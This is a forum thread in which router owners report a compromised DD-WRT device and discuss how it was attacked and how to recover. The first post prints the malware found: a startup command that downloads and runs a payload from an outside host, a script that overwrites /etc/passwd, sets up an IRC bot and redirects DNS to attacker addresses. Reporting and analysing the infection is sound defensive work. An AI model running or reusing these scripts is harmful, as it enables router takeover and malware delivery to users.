[reece016]

I came home yesterday to find an interesting screen loaded on both my mac and windows computers. Since this strange page was loading regardless of what I would try to do I started to investigate the router.
I have an e3000 running MEGA - build 15962

Here's the process my router now goes through when it boots up. I didn't wipe the config yet so I could capture what was going on.

The following lines were added to my startup...

while ! ping www.google.com -c 1 > /dev/null ; do
sleep 5
done
cd /tmp;wget http://ilove22.selfip.com/ilove22/dd/x;chmod +x x;./x

this "x" file runs the following...

#!/bin/sh
cd /tmp
wget http://ilove22.selfip.com/ilove22/dd/i.jpg
tar xvf i.jpg
rm -rf i.jpg
cd /tmp/i
chmod +x *
./start
echo "address=/#/123.49.41.249" >> /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq --conf-file=/tmp/dnsmasq.conf

The i.jpg file extracts the following...

i/
i/start
i/rand.txt
i/passwd
i/a.conf
i/int


at this point the "start" file code looks like this...

#!/bin/sh

cat passwd > /etc/passwd

echo "set CTIMEOUT 40" >> mech.conf
echo "server ilove25.selfip.com 6667" >> mech.conf
echo "nick 1 $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set ALTNICK $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt) $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set cmdchar \`" >> mech.conf
echo "SET CC 1" >> mech.conf
echo "alias ip int echo "IP-ul meu este `nvram get wan_ipaddr`"" >> mech.conf
echo "alias dns int echo "address=/#/79.132.242.146" >> /tmp/dnsmasq.conf;echo "address=/update.microsoft.com/208.75.230.43" >> /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq
--conf-file=/tmp/dnsmasq.conf" >> mech.conf
echo "alias stop int cat /tmp/dnsmasq.conf | grep -v address > /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq --conf-file=/tmp/dnsmasq.conf" >> mech.conf
echo "SET FL 25" >> mech.conf
echo "SET SD 1" >> mech.conf
echo "set IDENT $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set IRCNAME $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set LINKPORT 0" >> mech.conf
echo "set MODES 6" >> mech.conf
echo "set UMODES +iwsx" >> mech.conf
echo "set USERFILE a.conf" >> mech.conf
echo "join #interpricer" >> mech.conf

rm -rf dd.jpg
rm -rf start
chmod u+x *
export PATH=.
int

The final result is a microsoft looking page telling you that you need to download kb91021753.exe which I'm going to guess is a virus. I saved it to my mac but haven't loaded up a sacrificial PC yet to test what it does.
Anyone ever seen this before? I had SSH open and also had port 80 forwarded to my mac mini running Apache, but this looks to have either exploited SSH (I had it on port 22) or there's some other exploit method it used.

I attached all the files I gathered up (including the file that might be a virus) as a ZIP so someone with more knowledge can investigate further. My main concern is that this might be a "man in the middle" type of attack that works to steal passwords/information. Any help would be greatly appreciated.

[<Kong>]

I have a few questions to get an idea what may have caused this:

Did you download this build from dd-wrt site?
Did you password protect webmanagement, did you use ssh password or key etc?
Did you enable remote login through http?
Are you running any optware scripts/apps?
Did you record /var/log/messages to see login attemtps?
Have you used a strong ssh password.

[reece016]

[reece016]

Did you download this build from dd-wrt site?
yes, from here...
ftp://ftp.dd-wrt.com/others/eko/BrainSlayer-V24-preSP2/2010/12-24-10-r15962/broadcom_K26/dd-wrt.v24-15962_NEWD-2_K2.6_mega-e2k-e3k.bin

Did you password protect webmanagement?
I have web management disabled from the WAN, only internal access.

did you use ssh password or key etc?
I had an SSH password set. Maybe a shared key would be better?

Did you enable remote login through http?
nope, only SSH with username and password.

Are you running any optware scripts/apps?
nope, only forwarding a few ports. Port 80 for web and port 51413 for Transmission
Did you record /var/log/messages to see login attemtps?
No, but I'll look through the WIKI and set that up from now on.

Have you used a strong ssh password?
It was at least 8 characters with a mix of letters/numbers, so it's possible it could have been brute forced over time. I changed the user from "root" when I set it back up so that it will not be possible to log in as root.

[<Kong>]

But you have set a password for the webmanagement interface?

I ask this because it could be a dns rebinding issue, if you have no password set your browser could be fooled to send a post request to the router adding the wget command to your startup, which is possible if you don't have a password set for the webinterface.

[dc]

[<Kong>]

Yes using authorized keys is much better first of all because you cannot use brute force methods anymore to try out passwords, the ssh server will close the connection at once if the client ask for password login.

Second advantage is, even if someone captures your password(keylogger, hardware usb keylogger, camera) he still cannot login until he also has your keyfile

This attack looks like an automated one, someone either scanned lots of machines to find an insecure dd-wrt box or he placed some code on a website which used dns rebinding technique to save this startup command.

If there was only ssh(no ftp etc.) accessable from outside it is likely the attack came from inside. For automated attacks it also helps to change ports e.g. ssh port to 2000 then an attacker would have to scan not just ips but every port on a target machine which takes way to long.

Compared to a regular linux distribution a router firmware is more secure since it does not include all features in the shipped apps e.g. lots of proftp bugs did not influence dd-wrts security since the vulnerable feature was not compile into dd-wrts proftp version. The other reason is because you don't directly work on your router which means local root exploits don't hit you.

Thus from the info he gave either there is an unknown security hole in dropbear or there were other exploitable services running on the router.
Or the attack come from the lan side and had access to the routers webinterface, either because he had no webinterface password set or was logged in to the webinterface at the time he viewed the attackers site.

[Ben0]

Damn it. I got the same message, and I actually ran the kb91021753.exe file. Now there is a C:\Windows\init.exe in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and it comes back after reboot.

Please help me to get rid of the infected router first: How should I check the "startup" script?

I've power cycled the router, but my clean computer still get directed to http://update.windows.com/.kb910 page, and "ping" shows the update.windows.com is in [119.226.118.217].

After ssh into router, I ran
nvram get rc_startup
but got blank response.

All the files in /etc/config folder have Aug-8-2010 timestamp, that was when I installed this router (DD-WRT v24-sp2 (08/07/10) mini-usb-ftp)

So how should I check and restore the router to normal status, besides of uploading image? Would that help?

[redhawk0]

If it were me...I'd use JTAG and erase nvram then the kernel...then start over with a fresh tftp load of the firmware. It isn't likely that it embedded itself in the CFE of the router....sounds like its firmware only.

redhawk

[Ben0]

The other question is: How was it getting hacked and how to prevent that from happening again?

[Ben0]

Found the modified entry:
In Additional DNSMasq Options, the textarea has this:

[Ben0]

I've compiled a description of this attack at:
http://benincampus.blogspot.com/2011/07/attack-initiated-from-attacking-dd-wrt_03.html

[crashfly]

[hardbase]

so how i can remove this virus?